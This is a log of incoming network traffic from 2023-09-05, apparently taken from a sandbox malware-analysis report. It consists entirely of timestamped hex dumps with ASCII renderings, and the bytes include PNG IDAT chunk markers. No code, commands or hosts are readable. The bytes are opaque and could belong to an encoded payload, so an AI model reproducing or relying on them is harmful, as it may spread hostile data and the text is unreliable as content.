2023-09-05 11:01:22 UTC	167	IN	Data Raw: d2 bd fb 76 d7 f5 13 35 ea 3e 1f 09 c7 95 0f 2d c4 b4 13 4b 5d 88 b0 37 33 b4 12 3e 37 25 12 cb 91 b5 98 61 93 b5 9e d9 03 95 aa 93 73 b5 07 b9 00 a0 d3 3f 5b 35 3e 37 f3 3e f4 5e d0 b6 52 34 c0 14 b1 4b 63 bd 0a 2c 80 04 20 79 30 e1 36 47 a0 01 b0 76 4b 3c 1f 83 83 b7 b1 fb c3 b5 9b 6f 16 dd 52 28 a0 75 52 52 a0 71 3f 0b 03 76 e2 df 72 b5 44 9b 72 bd 45 4f 88 88 93 4a 88 73 c1 ab 08 f1 ea c2 b0 b5 6e 6f 13 f5 35 b2 47 a5 9b 29 01 cb 68 c0 b1 1b 95 e1 ed 00 00 20 00 49 44 41 54 b1 b3 4a b2 b1 5b 70 c2 c7 06 c0 16 b0 23 4d 6b 44 12 19 eb 05 43 4a 26 a4 03 ea 22 b4 99 5e 32 b4 98 46 72 e4 16 c3 0f a5 00 48 c0 b7 92 51 0e bf d3 1b 02 f5 00 42 8b b9 10 ea 00 14 17 b8 01 36 fa 5b 88 7a 50 03 28 7d 9b 99 03 66 fc 09 09 3c a0 7e 42 b1 4d 15 51 bb 62 46 0b 45 1f Data Ascii: v5>-K]73>7%as?[5>7>^R4Kc, y06GvK<oR(uRRq?vrDrEOJsno5G)h IDATJ[p#MkDCJ&"^2FrHQB6[zP(}f<~BMQbFE
2023-09-05 11:01:22 UTC	183	IN	Data Raw: 05 1c 12 4d 41 59 7a 59 1f 14 17 69 f4 b7 3e 53 53 dd 06 b3 06 75 13 58 c2 b4 5e 6f 23 7d 43 a3 b8 55 17 23 c7 d5 10 2b 23 a1 ff a4 a1 99 3e 0b 28 e7 fa e9 46 b1 1b 2b 03 bc d5 4e 67 10 56 1a a8 75 13 2b 7d e1 52 c8 23 b7 10 0b 22 a6 1b 6b 08 42 ca 4b 35 55 10 e8 c3 e0 63 0d 28 f7 11 d3 46 b6 0e ab 03 88 30 6f a3 b5 1d cc 0b 05 5f 44 87 b7 e1 5b 15 38 5a cd 82 4c bb 1a f2 eb 95 96 0a f6 4f bf 40 e8 b2 9a 63 b5 d5 4e 73 60 11 95 d3 b4 91 1d 6b 72 17 27 46 b4 db 0b 02 a5 1e 53 03 86 d2 70 c8 ba 86 8b a0 2f 06 5a 4b 81 46 8c 29 00 00 20 00 49 44 41 54 01 53 4a b3 bd 21 82 c3 f2 b2 df c2 3c 1f 5b 52 b4 8c 1f 02 bd 9b 56 1b a6 5e 5a 8a a8 1a 1e 81 c7 1e aa 02 ca f3 4a 16 b4 13 ea 42 44 12 40 d3 5e 3a 72 a3 32 66 19 08 46 10 a2 5c 45 13 ea e2 b4 99 79 0e 44 13 Data Ascii: MAYzYi>SSuX^o#}CU#+#>(F+NgVu+}R#"kBK5Uc(F0o_D[8ZLO@cNs`kr'FSp/ZKF) IDATSJ!<[RV^ZJBD@^:r2fF\EyD
2023-09-05 11:01:22 UTC	199	IN	Data Raw: 02 e2 9b 09 0b b1 fa 07 b1 b4 1a a0 0b 14 3b a9 00 ed 16 38 07 3f 82 5c 56 3d 92 5a 88 80 8e 3d 47 b5 b0 4a 07 f3 9b f9 03 3c 4a 43 eb c3 18 87 a4 bf 97 5b 45 4a 47 a3 6a 1b bd fb 82 44 13 1b 02 e8 22 56 c0 65 19 e5 3c 64 19 28 01 62 19 51 df be 27 91 08 97 63 9b 08 e2 9b 7e d1 be 62 c9 00 35 18 ab 00 b9 29 b8 77 af 44 e3 eb 44 97 3e 08 e3 63 40 97 75 17 c8 7c be 63 40 13 ea 4c c3 12 07 1a 17 43 16 c4 40 63 be 30 4a 58 5f 32 db 20 87 13 9b 2a b3 b1 d3 83 b5 d1 c6 0b b1 d7 43 93 a2 42 a3 87 2f 55 98 81 e4 13 ab 02 ba 7a 1f 62 ab 16 53 eb e9 9c 18 4f d4 11 1d 30 43 92 1c 86 75 64 28 88 c4 db 59 bb 00 00 20 00 49 44 41 54 b8 33 47 03 30 db 3f 5a 3f 13 77 51 b5 66 47 3f dc 67 45 fc b0 90 eb 13 b7 f9 4d fc b0 b6 3b 03 95 1d f5 0a 3e 07 ea 07 3c 5e 53 f1 b1 b3 Data Ascii: ;8?\V=Z=GJ<JC[EJGjD"Ve<d(bQ'c~b5)wDD>c@u\|c@LC@c0JX_2 *CB/UzbSO0Cud(Y IDAT3G0?Z?wQfG?gEM;><^S
2023-09-05 11:01:22 UTC	215	IN	Data Raw: 74 b8 a2 65 78 05 3c bb 43 65 2d 22 43 f3 02 47 33 b7 aa d9 45 14 62 18 2b a1 97 99 b3 81 69 fb 37 b9 91 c7 c5 bd 90 4a 82 b6 99 18 37 36 13 d9 33 39 13 ca 78 97 57 3d 0a c5 8b 4e f2 b5 f9 db 47 c1 31 ce ca c0 12 54 6b 19 66 0f 03 dd 32 02 13 aa fa 5f 10 cf aa 4d 2a b9 51 49 47 15 44 7f 65 36 ec 4f 0c 2d 96 39 01 e4 9f cf 8f 53 24 9d 96 f5 9b 08 47 ba 97 ad 50 b6 aa 0c d2 b9 b0 48 d1 2d 36 1a 53 b5 b4 41 11 16 a4 d1 76 d6 12 dd 27 3e c4 6a a7 20 c2 19 eb 28 95 4f 76 b8 a3 51 07 3e 41 0f 47 b1 62 f6 45 c5 6f 6a d3 bd 42 a3 1c 82 50 d1 27 3c 9e 20 47 cf af 09 99 91 fb 53 33 ba 13 7a 00 86 d2 c1 66 b6 99 b2 63 3f 57 49 82 52 70 df e7 21 91 4b c1 b1 29 b1 76 e2 c3 79 43 00 00 20 00 49 44 41 54 f1 74 70 b3 7b 1d cf ef d7 88 4f 0e a0 6d 43 c2 c0 1a 00 47 e4 fa Data Ascii: tex<Ce-"CG3Eb+i7J7639xW=NG1Tkf2_M*QIGDe6O-9S$GPH-6SAv'>j (OvQ>AGbEojBP'< GS3zfc?WIRp!K)vyC IDATtp{OmCG
2023-09-05 11:01:23 UTC	231	IN	Data Raw: 2e b5 2d 18 83 c0 2e c0 57 91 1e c0 02 ae 12 c0 1a d3 91 b0 59 c2 1b 4a 03 b0 53 39 00 36 d1 6b 65 f5 99 49 65 88 48 4b 03 a4 2f 4f 42 b5 12 5a c3 95 53 0a 41 b5 50 2d 86 6e 66 7c 65 8e 12 93 77 7b f9 7b 55 3e 66 4b 27 b9 45 c0 7f 91 06 2d 03 3e 14 0d 53 f3 fa 7b 53 b5 12 4b 88 6d 74 c0 04 f2 42 1b 44 5d 31 4b 05 ec 12 5c 5a b1 66 4e 82 a2 ce 14 5d ba a5 4b cb ba a5 88 28 74 49 88 06 35 28 4f 80 ab 74 c0 0d ba a5 4b 01 ba a5 b2 28 72 67 45 42 b4 4e 42 41 f7 54 0d 83 bf f9 4b eb ea 4c ce c3 c8 16 c8 03 7d ed 88 7d b6 78 4a 5b b6 12 e6 01 b5 9f 09 fc ee d1 c6 0b 11 36 4b 03 b5 9f 2f 27 b5 12 78 c3 3f 56 6f 0b e6 99 5b db 74 f2 43 83 9e 1a bc c1 b7 11 cb 0f c1 01 c1 09 f7 2a cb da c1 c3 cf ca c1 43 48 0a b5 67 a6 08 6d 45 c0 c0 f9 09 bd d2 00 00 20 00 49 44 Data Ascii: .-.WYJS96keIeHK/OBZSAP-nf\|ew{{U>fK'E->S{SKmtBD]1K\ZfN]K(tI5(OtK(rgEBNBATKL}}xJ[6K/'x?Vo[tC*CHgmE ID
2023-09-05 11:01:23 UTC	247	IN	Data Raw: 02 fc 92 90 30 67 11 87 bb ed 82 75 38 bd 1a 3f 23 25 58 09 3e 75 5e 4b 47 b5 60 ba 80 4c 01 39 c3 a8 91 b2 27 c2 0a 18 b9 14 8b eb c0 3e 16 9e 5f 15 10 e8 02 b4 02 88 82 4c ae 7b 02 c7 00 ca 9f 4c d8 2a 43 e7 10 8a 3e c3 18 f8 03 ab 04 59 00 f5 15 fa 9a f6 f5 1c 88 7b 12 2d 80 cb 10 71 76 b6 9f 4b 4d b1 74 c0 12 d3 91 b1 0b e9 66 4d 53 b5 3d 3e 04 d3 1a c8 7a b7 b2 04 ab a5 67 41 23 d3 97 99 bc b5 82 1b 76 b0 1a f4 43 f5 02 74 d3 36 f2 4a 03 df 3c 47 01 e3 d3 ab 04 a5 19 b3 eb 3d e2 1d 88 45 4b cb 86 43 4b 3f 44 dd c2 1b 8f f0 af 4b 55 5d a0 fb fc 4a 4b ce 03 75 4b 3f 30 dd d6 73 40 a5 12 1d eb 14 17 cb 21 dd aa 0e 01 35 82 4e 43 a4 7a e7 01 f5 6d 4a 07 f5 67 48 80 7a 52 c0 c4 b5 d3 a3 00 36 f2 73 08 4d 13 4a 11 b3 91 ab 04 be d5 14 03 eb d1 1e 88 59 41 Data Ascii: 0gu8?#%X>u^KG`L9'>_L{L*C>Y{-qvKMtfMS=>zgA#vCt6J<G=EKCK?DKU]JKuK?0s@!5NCzmJgHzR6sMJYA
2023-09-05 11:01:23 UTC	263	IN	Data Raw: 8f b7 4b 4b 0b df e6 b4 16 85 23 5a 03 9f ed 5e 2b b5 14 15 ca 76 52 21 03 4a 66 6f 13 b0 11 a3 07 b1 12 4a 42 a5 d1 1e 88 59 12 c8 ef b9 41 c8 66 4d 12 4b 55 e2 99 36 0b 3f 0d c6 03 c2 13 c2 76 49 91 76 f3 b5 36 0f 03 b4 6c 44 0c 03 92 88 69 bd 42 a3 8f e8 12 67 03 ec f9 44 88 b8 92 6c 47 b7 12 4b 09 3f 16 0a 80 55 1a 4b 86 75 66 4e 89 ab 54 a0 13 65 92 b0 2e 35 08 3e 05 36 12 06 17 b7 f9 4e 83 4e 39 47 76 b3 92 40 03 bc 99 0e 13 30 32 8b 0c 39 9e 4a 83 82 ea 4a 0b ba 96 c8 01 b1 36 44 8c cf 17 4b 07 df 92 46 5a c0 36 cb f8 35 22 3f 0a 72 57 5b 09 b5 58 4b e8 87 98 4d 3f cd 66 46 17 89 4a 49 0a bd 13 42 1c 3c 5f 0b 13 8c 5f 5b 76 a2 12 5f 76 b7 00 c9 0c b1 2e 13 76 bd 98 43 5d b4 54 ca 32 36 da b4 30 f5 c0 bc 76 a5 ad 48 83 9c 9b 4f 46 41 16 15 0c 03 e1 Data Ascii: KK#Z^+vR!JfoJBYAfMKU6?vIv6lDiBgDlGK?UKufNTe.5>6NN9Gv@029JJ6DKFZ65"?rW[XKM?fFJIB<__[v_v.vC]T260vHOFA
2023-09-05 11:01:23 UTC	279	IN	Data Raw: 4c e6 41 e8 02 b8 30 41 62 00 5b 05 44 7d 13 4b 47 95 5d 06 42 fc 5c 6c 01 e7 24 4b 33 87 2a 46 09 98 32 3e a3 db 73 29 6f d0 92 09 23 b5 56 4f 77 dc 52 54 79 d0 32 23 66 99 73 3b e0 b3 f3 4f 34 54 16 25 6c 37 66 2b 1d da 67 2c 6b 95 72 3b 13 d6 77 6b 65 55 1c 27 6c c2 48 22 0b b2 73 ca 37 52 14 7d f5 b3 61 1f 77 d1 ea 4d 36 54 14 3b 43 94 32 47 75 dc 32 30 63 79 74 3e 6d d6 d3 2a 07 95 71 2a 6f d9 10 4e e2 b1 30 7f f5 be 4d 24 6d 55 89 3f 2c 86 f2 dc c3 b5 32 3f 42 a9 f4 40 32 8c 03 a0 1d da 62 2e 03 be 7d 25 70 37 7d ab 02 d1 77 3d 6a d6 7a 4e c2 d1 36 2e 7b c5 77 28 03 6f 30 68 0c 5c 38 2a 07 57 31 23 07 d8 67 27 77 9d 7b 3f 6b 15 d8 2f 23 91 71 20 84 58 17 bc 21 31 14 2f 62 c1 73 8b 06 85 1f 41 62 d7 72 d8 a3 21 32 3b 03 c7 7d 2c 71 d4 7f 6b 77 82 d2 Data Ascii: LA0Ab[D}KG]B\l$K3F2>s)o#VOwRTy2#fs;O4T%l7f+g,kr;wkeU'lH"s7R}awM6T;C2Gu20cyt>mqoN0M$mU?,2?B@2b.}%p7}w=jzN6.{w(o0h\8W1#g'w{?k/#q X!1/bsAbr!2;},qkw
2023-09-05 11:01:23 UTC	295	IN	Data Raw: 9a cc 3e cb 1e c0 7e 2f 7c 14 16 aa 58 d4 19 eb 1b f5 1a 8a 05 d5 5e 26 40 57 57 6b 01 dc 7c 38 77 b4 58 24 ab d3 32 6c 44 ba 35 89 86 d0 12 15 fc 90 97 2a 0b 70 02 49 00 b0 47 6b 88 fc 33 c9 6f 2c 11 42 61 d0 12 67 83 a1 62 2f e3 0d 63 2c 37 b5 12 1f e3 b2 9f 7d e3 be 7e 4d 6a 51 19 ee 8d dc 7c 2d 6c 95 1c 26 a3 86 32 00 23 81 76 2e 65 d4 97 aa 67 df 13 3a 74 d4 60 25 63 bd 91 ea b0 d5 9a 39 71 da 60 38 66 ff 6e 27 62 d0 58 89 33 56 c7 cb c4 f4 1c 27 af da 75 4a 2d 56 16 2d 01 82 32 6b 61 cb 77 6a 91 d5 db cb 54 f7 10 2b 92 91 17 6b c7 9d 7d 4b 8b c2 60 22 42 c7 b7 43 c0 b4 11 eb 0e f9 7d 2c 64 75 13 2f 4d 33 56 8b d4 d0 79 2f 6c db 35 2b 24 59 62 3b 23 ed d2 44 50 95 70 ea 16 51 ba 43 67 da 66 8a 1a da 66 64 31 b5 61 2e 60 9c 32 63 2e c4 f4 6b 02 e1 92 Data Ascii: >~/\|X^&@WWk\|8wX$2lD5*pIGk3o,Bagb/c,7}~MjQ\|-l&2#v.eg:t`%c9q`8fn'bX3V'uJ-V-2kawjT+k}K`"BC},du/M3Vy/l5+$Yb;#DPpQCgffd1a.`2c.k
2023-09-05 11:01:23 UTC	311	IN	Data Raw: 73 b7 3d 7b 03 f8 17 7b 03 d9 22 4b 5c 0c 90 4b 03 b5 be 77 40 b5 86 4b 33 1f 6a 4b 33 dd 12 53 4f b5 0a 73 03 ad 18 57 03 ad 1a 4b 0f 41 29 08 03 1f f2 4b 0f 79 12 47 ab b5 1e df 03 b9 b8 cb 03 b9 66 4b 0f d1 12 4d 57 b5 14 e1 4b b5 14 73 03 b3 3a 4b 05 ad 12 4d 81 bd 12 4d f7 8f 51 4b d7 b5 14 11 c3 b5 14 d7 03 b3 13 1d 8f b5 1c 3f a8 b4 04 4b 05 f9 12 4d 3f b5 11 7b 03 b6 58 6b 03 b6 1e 4f 20 45 2b 48 04 69 47 4b 04 7d 12 48 af b5 11 d3 03 b6 92 46 07 a2 39 4a b7 bd 12 6b 0a 98 1f 45 5e b5 15 4a 00 b4 12 4e 03 b5 d2 e1 08 b1 19 56 03 be 16 4f 08 23 1a 40 a9 38 12 40 0b b1 19 c5 8b b0 9d c3 06 1f 82 c3 06 24 9a 4e 91 3d 17 d8 8b b0 b8 48 83 b4 15 cb 02 bf 92 4a 8f 3d 5d 09 09 b5 28 7b 37 85 73 ca 06 a1 12 75 40 b5 57 18 53 b5 1e 5a 87 b6 2a 7e 33 37 03 Data Ascii: s={{"K\Kw@K3jK3SOsWKA)KyGfKMWKs:KMMQK?KM?{XkO E+HiGK}HF9JkE^JNVO#@8@$N=HJ=]({7su@WSZ*~37
2023-09-05 11:01:23 UTC	327	IN	Data Raw: 36 86 21 72 59 85 10 60 8b b0 10 47 32 a9 22 51 01 85 52 3e 07 a1 11 6e be e5 12 15 d9 23 22 66 c1 9a 5d 4b a3 ab 5e 63 bd 9d 26 8e 00 d5 05 0d 0a b1 23 69 07 95 5f 4b 6b 92 c9 ec 6a e2 31 01 03 78 12 ac 46 6b b5 50 10 b5 29 05 7d 82 28 ce fa f2 92 62 e2 8a 15 94 62 0d be e3 03 b1 90 4a 03 a0 ad 78 1d b5 84 53 a8 4e 5b 9d fb 86 12 c4 e2 16 4d f4 14 b7 80 4b a6 4f eb df c4 8b 8d 0c 03 82 13 7c 18 35 31 89 95 b5 0f 5a 7c 60 25 6c d0 de 12 69 15 08 6c 3e 99 7d 44 4b 58 a1 0b 98 05 81 3c e0 03 3e 75 07 29 8e b4 47 97 b5 e6 2b 07 6e 65 47 a8 7f 12 14 3a de 81 72 6e 69 24 4b fe fa c7 58 e2 26 93 07 03 af 9e 73 5d 33 96 c7 f1 b5 34 92 b6 f5 5a 9c 51 5e 12 75 87 eb c7 bb f9 1c 9a 4b d8 1c 99 32 da d5 0c 48 03 18 4a c2 a3 f4 e2 1c 78 b5 d7 cb 4a 86 bb fc 1c 1a 12 Data Ascii: 6!rY`G2"QR>n#"f]K^c&#i_Kkj1xFkP)}(bbJxSN[MKO\|51Z\|`%lil>}DKX<>u)G+neG:rni$KX&s]34ZQ^uK2HJxJ
2023-09-05 11:01:23 UTC	343	IN	Data Raw: eb dd 95 48 98 81 b8 99 27 75 30 9a 26 b0 62 49 3e 07 60 43 eb 2d d1 b4 13 4a 9b 0e cf 05 9e 1b fc e0 ba bb e8 a8 05 14 53 f5 68 93 bb b8 0a b4 56 6d 8b 02 f1 96 1a a3 5b 52 e0 48 e2 d3 71 49 8a e5 c2 31 5f 91 82 6a e0 45 82 aa 03 3c 53 7f 36 f1 e2 48 d4 11 86 3f 14 a0 56 45 37 aa ff 91 81 bb 05 b1 45 4a 10 bc 01 d8 ed 49 ef 36 6f 4f 0f b4 d2 83 46 a5 21 99 88 e5 52 1b ea 1d 83 53 9e 44 03 36 03 b9 10 3e 10 3e 5f 5b 88 35 53 7b 88 e4 26 a2 8c 34 13 49 87 36 13 48 76 bb 99 1e 13 b5 21 82 88 f7 3a c0 d2 5e ba 33 e8 c5 22 4a 03 83 13 1f 33 b4 9a 2f e8 e9 22 4a 07 c0 1e 7b 02 9c b2 db 05 2c f2 14 49 a5 13 4e 76 a1 05 f3 e1 91 da 4b c3 a5 9f cf 07 bf 9a 8b 03 2c f9 7e e8 98 77 8b 02 b3 d6 4a c2 55 42 00 c3 b4 13 5a c0 b4 0a a0 13 75 13 4c 76 bf 13 f8 07 a3 8b Data Ascii: H'u0&bI>`C-JShVm[RHqI1_jE<S6H?VE7EJI6oOF!RSD6>>_[5S{&4I6Hv!:^3"J3/"J{,INvK,~wJUBZuLv
2023-09-05 11:01:23 UTC	359	IN	Data Raw: 03 7f 43 19 2d 72 97 2b 02 25 12 b2 62 0e 54 8c 86 e9 13 db 03 42 a6 a2 cd 72 97 13 52 25 12 bf fa 9c a2 6a 53 25 12 3f 17 40 d4 1b 0d e1 82 4b 69 f2 c0 5b 42 72 97 07 93 b5 bd 95 1a b0 82 55 4b 25 12 56 e0 a6 0e 8c 87 30 56 1a 10 74 3c 06 6b 44 95 4b 8e 38 ea bc fc 4a 43 a3 87 22 24 3b 2b 71 1a c6 96 54 12 0f 88 38 a3 6c eb 6d 2b 2b 71 f0 32 a3 30 67 99 c6 12 9d fa 83 12 47 12 b3 88 20 43 63 51 3e 57 6b fb e5 fa 93 1d d7 11 c2 86 a7 a6 eb 10 3e 9f 0a 2a e4 99 1e 53 4d 40 a3 bc 30 13 2f 13 a7 99 4a 31 9f 42 c0 4e 4d 43 a3 a5 d0 97 4a cb d5 1a c0 96 94 39 e8 07 38 a7 ce 02 71 93 4a 8e a4 3e e8 07 c1 97 4a 2d 05 23 4d 01 98 b1 4f 58 31 13 0e f7 99 99 de c2 98 61 4f 46 e0 13 fb 88 63 9f ca 2d f6 16 64 46 b1 d2 9a 06 c7 3d ea 43 b1 fa 1a eb a3 97 4a 1b 34 18 Data Ascii: C-r+%bTBrR%jS%?@Ki[BrUK%V0Vt<kDK8JC"$;+qT8lm++q20gG CcQ>Wk>*SM@0/J1BNMCJ98qJ>J-#MOX1aOFc-dF=CJ4
2023-09-05 11:01:23 UTC	375	IN	Data Raw: 46 3d bd 4c 30 c5 56 50 e2 53 06 f3 03 b5 12 4b 86 75 66 58 4b b5 99 cf 27 6d 1f 4b 03 ba 82 fd 83 b8 14 4a 93 c0 37 4b 8b bf 8a 49 eb c0 1d 3f 77 b2 d4 0f 23 91 76 4b e8 b0 13 53 02 ba d0 fd 03 bf 9a 0f 27 d3 13 5b 03 bd 10 8b 03 f5 1f 03 88 39 36 1b 03 b4 12 4b eb 34 37 4b 03 34 17 cb 88 f5 0a c8 e3 bd 12 77 09 98 1a ef 0f b6 62 51 4f 38 96 63 27 bd 11 4a 2f 21 10 51 4b 3e d2 07 27 e5 fa 29 25 b5 1b 4b 1a 31 92 4e 03 b2 9b 0f 27 fd 13 47 07 85 1b 48 0f f5 5a 8c 47 91 78 73 03 10 12 4a 0b 85 13 43 03 b2 3a 1b 07 b5 12 43 03 b2 32 4b 7d b5 12 0e 30 7c 57 78 c3 86 c0 88 02 3a 13 16 fc 21 36 13 03 a2 16 88 37 d0 13 c9 62 d0 92 08 83 b7 9a cf 67 91 93 4b 1a ba a4 c8 00 35 03 39 c2 32 4e 5f 0c 0f fa 42 82 97 13 4c 3b 3c 53 5f 86 b9 13 42 00 fb 9a 8b d5 b9 15 Data Ascii: F=L0VPSKufXK'mKJ7KI?w#vKS'[96K47K4wbQO8c'J/!QK>')%K1N'GHZGxsJC:C2K}0\|Wx:!67bgK592N_BL;<S_B
2023-09-05 11:01:23 UTC	391	IN	Data Raw: a3 7f 1f 4f fc bd 11 0b 90 80 4d 10 57 45 16 b9 28 f8 f9 c6 ad e2 eb 15 3e fd 91 84 96 2e 86 92 3d 8f 4a 06 63 91 86 a0 91 fa eb d5 97 90 c8 83 5b 77 71 84 f1 fe 8b 55 cc 5d c4 a8 e7 d9 6a 1c 6f dd 52 44 b7 66 30 fd de f5 20 1e eb e2 6e dd c5 5b 99 97 d2 e9 ca 50 f3 e3 31 9e a7 7f b3 e6 ae c6 22 19 c6 0a 1e 3a 57 e6 f5 b7 4d eb 6b 0c a6 a5 18 81 39 4e 8d 83 5f a7 84 fd fb 5e 51 25 e6 16 d3 57 ba f8 2c 16 2f 08 d1 3e 42 dd 40 96 de d1 e3 1c c8 40 2e dc 9c 65 ea 46 43 cf 3d 13 c2 a2 45 99 e9 1f 85 d4 32 dd 02 f5 45 28 b0 a1 7e 10 91 0d 1c c6 0c a6 7b 9b c2 a4 c5 f3 4b 88 2e fe 02 ae e6 cc fe c3 29 86 26 b7 b8 71 e0 6a 22 91 a5 9e 95 85 6e 00 69 03 f7 52 86 42 67 17 3f 3a 19 81 56 ea 9e b4 38 0d d3 16 e6 b1 c2 e5 d4 29 91 b6 93 9f c9 10 55 ff ad d1 0e 8a ae Data Ascii: OMWE(>.=Jc[wqU]joRDf0 n[P1":WMk9N_^Q%W,/>B@@.eFC=E2E(~{K.)&qj"niRBg?:V8)U
2023-09-05 11:01:23 UTC	407	IN	Data Raw: 5d b5 6f 4d 78 a3 19 8a dd 98 c8 ea 50 8d 2f 15 f2 3a 10 00 45 28 35 e8 e8 f5 eb fd ec 6d 0d 61 f0 5e 08 01 1d 0c fc f9 82 3f 67 83 ea 01 ae e4 1e 3e 9d 08 00 55 9f c3 d1 2f 87 ea 40 c6 ee 15 98 ac ff fe fe 65 96 a1 3e fd 18 84 15 8d 19 9a 00 58 cc 7d 7e b0 c2 e5 19 14 bb 1b e3 b4 49 c8 50 db 20 cc f0 77 86 af c3 e2 b1 2e 26 6a ba c9 81 c4 03 31 69 38 9f d0 0a b1 1c 90 e1 e2 d3 89 97 e1 bd f2 66 ea 8f 50 b0 25 34 fd d8 b9 b5 c4 c0 f1 90 1d e8 26 dc 7f fa 7b f5 ba c2 fb f1 8c 07 9c 9d 49 da 73 8a 0c a8 1f d4 4f d9 67 45 fb 4b e3 b6 55 63 03 3b cf eb 04 54 7b 8d 20 80 1d aa f5 6e 34 d8 79 5c d6 76 2a 2d b3 78 8a f7 8e ef bd 9f 9f 46 00 31 d4 32 b6 50 b7 c0 e8 41 7e 8f b7 47 a7 38 2c 39 b5 f2 d7 65 4c c8 bb e4 a8 b9 3b 16 d7 9c 10 8a 1b e5 7f 1f 4f fc df ec Data Ascii: ]oMxP/:E(5ma^?g>U/@e>X}~IP w.&j1i8fP%4&{IsOgEKUc;T{ n4y\v*-xF12PA~G8,9eL;O
2023-09-05 11:01:23 UTC	423	IN	Data Raw: f8 e6 7e c3 c8 e3 1e bc bd 30 99 2d 35 c6 4c 0a 4d a7 44 8a df ed 6a 59 4b 47 ef 69 17 44 96 95 83 01 a1 d6 3e bd 18 d2 dc d1 e9 1b 45 36 1f 16 5a ff 1b 42 a1 78 0e ea d2 46 33 9f 92 ef cf 12 d1 3a fc 6a 5b 28 35 32 6e 60 35 f2 68 2c d9 61 f0 d7 65 4c c8 f7 e5 7c 52 6b fd 95 8a 3b 70 14 5f fc 5f f5 ab 5c 89 97 52 d7 cd 29 42 45 16 52 11 c3 7c 06 4a 5b 17 15 3e 7e dc 52 40 39 fa 6a c3 87 40 3b dd 77 87 15 bf 83 38 e3 7e 9e b7 bc ab 74 e8 6c 72 3e 9e 02 0c 12 77 ef 16 71 03 0b d8 04 20 f1 6c b5 ba 7e 9b 3d 94 81 a2 19 b2 77 c4 c6 5e 3a ce 1b 21 4b 2d ca df ef ea 80 38 a3 c7 e8 be 3e c7 35 e0 83 07 99 b6 93 41 8a d2 15 9e 1f 6b a1 f3 63 23 e3 66 0d 84 76 54 2b 72 5e 75 4f e1 67 ce 0f 2c e0 0b fb 41 7e 83 10 c0 1f 9b 11 ad 9a bd 1e 67 80 de 53 4a 4c 87 5c 24 Data Ascii: ~0-5LMDjYKGiD>E6ZBxF3:j[(52n`5h,aeL\|Rk;p__\R)BER\|J[>~R@9j@;w8~tlr>wq l~=w^:!K-8>5Akc#fvT+r^uOg,A~gSJL\$
2023-09-05 11:01:23 UTC	439	IN	Data Raw: c0 f4 9c 6c 60 6c 73 40 4b ed 1e 4e ab 42 31 3b 5b b5 1a 32 eb 55 e0 77 c7 72 10 39 6a 26 8c 00 ff 65 72 d1 53 67 b2 e6 2b 39 df 5d b7 44 59 88 8b 5f f9 1a 07 7f 1e 7f d9 5a 9b 45 b8 41 c8 0a a5 f4 f2 0f 57 6e ae 51 4b 84 b7 01 47 07 a1 83 66 82 c4 fe 4d 55 a8 97 5f d1 6a b5 4d ef b2 25 c2 b8 eb 36 bc af 98 c5 23 3d cc 60 3b 84 c3 91 32 5f 94 e5 ad cd 6a 63 06 f3 d0 fe 59 04 53 3e ab 14 b1 de 4f 4c 84 80 20 4d 52 9e e8 42 96 da 56 fa 5c ff e0 64 1f f5 7a 28 f2 ba 93 81 1e fd ab e0 7c 06 a2 6a f8 10 80 03 e7 bd ec 58 02 ce 63 bb 96 ac 8e e6 41 09 bd 99 89 b6 d7 15 bb 4c d0 b7 ac 84 f1 75 c6 af 0d 21 49 ae e9 99 da 41 4b ed 52 76 8f cf ce 34 df 0c 55 02 62 90 92 f2 04 de 96 fb 1b ae ca 50 fd 75 2e 93 c7 0b a8 5b 29 39 56 1b 44 34 1e 88 00 90 4c 10 3e 6f 96 Data Ascii: l`ls@KNB1;[2Uwr9j&erSg+9]DY_ZEAWnQKGfMU_jM%6#=`;2_jcYS>OL MRBV\dz(\|jXcALu!IAKRv4UbPu.[)9VD4L>o
2023-09-05 11:01:23 UTC	455	IN	Data Raw: 51 9d 8f 91 82 85 95 fb f2 7f ac 06 2b a1 98 5b 3a c4 06 5b d2 de 70 a8 c1 87 3c 09 9b b9 e2 ea 14 b7 fd 92 97 9f fa 01 48 f0 1a ce ef ff 4b 84 fe e0 90 ab 2e 9d 21 6e 62 a9 fd 0c e1 3b 30 f9 d0 78 70 12 22 92 15 77 c5 3a 89 44 78 bf c5 d2 5c dd c1 e9 1a c5 d7 c2 33 32 24 1c 4e 3c f7 94 af 19 81 a2 81 43 7e 79 59 5a 9b c0 e3 b3 5e cd e3 e8 74 89 df 6e 45 20 05 44 27 11 47 07 d3 7e 83 8f 00 da 05 dc 94 b2 ca 5a 3e fb 01 34 26 fa f1 33 97 91 74 28 65 27 d9 35 b0 44 5b 8f bd b5 3e dc e2 4f ba d7 65 89 e0 b6 16 f2 eb 00 09 50 30 52 10 87 41 13 5c 73 5a 59 16 b3 a3 80 7c 9f 8a b8 da 97 f2 34 e0 82 b9 f6 94 5e 95 b3 62 21 2b ba 60 03 a2 6a 13 fe 2c aa f0 f1 d5 d3 f2 13 f8 7c 04 b9 c5 a4 c2 e5 91 23 3d 1f f2 64 13 1c 0f a2 6e d1 a2 a9 dc 00 25 86 a8 21 9a 3a f5 Data Ascii: Q+[:[p<HK.!nb;0xp"w:Dx\32$N<C~yYZ^tnE D'G~Z>4&3t(e'5D[>OeP0RA\sZY\|4^b!+`j,\|#=dn%!:
2023-09-05 11:01:23 UTC	471	IN	Data Raw: b5 3f b0 44 47 04 b5 bd b9 79 b0 93 c6 e9 1b ea 7a 54 10 79 2f c8 86 15 d4 c7 e9 27 34 33 97 07 f1 96 32 8d cc d5 d8 ba f6 97 ec 5e f9 34 63 46 5e 5c d2 9a 9b 01 32 02 65 b8 58 26 29 2e 37 0d b3 f1 1e c9 57 f5 f6 19 70 5c d7 c6 91 b8 b1 f8 1a 5f f5 19 c3 b4 49 29 55 00 d9 a0 e9 16 d5 f9 49 a2 33 6e ee 9b 21 4f cf a5 db 08 93 c1 75 1f 5f b7 18 26 76 92 9c fa 02 62 bd 67 3e db e2 db 0a 07 3a 9d 52 73 bc 49 db 3a 61 90 8b e9 07 f3 ad d1 d0 6c 35 27 b3 af b1 5b 4e 44 31 44 88 06 2e b3 7f 00 9b 4a ba da 86 26 73 8a 0b 23 c7 18 d7 05 df ba 69 51 f9 ee d6 a2 70 54 00 b7 d1 8a b9 be 81 b4 2f 4b ee 72 b1 bc 4f a4 5b 81 01 9e b6 d5 95 b3 45 a3 71 45 02 f9 6c f6 eb b8 29 29 f0 a3 cc 03 90 14 8c 8f f1 96 6a 09 2f 21 8e 60 e1 73 17 ff dc 20 ef 2d a2 d4 94 15 5c 61 5e Data Ascii: 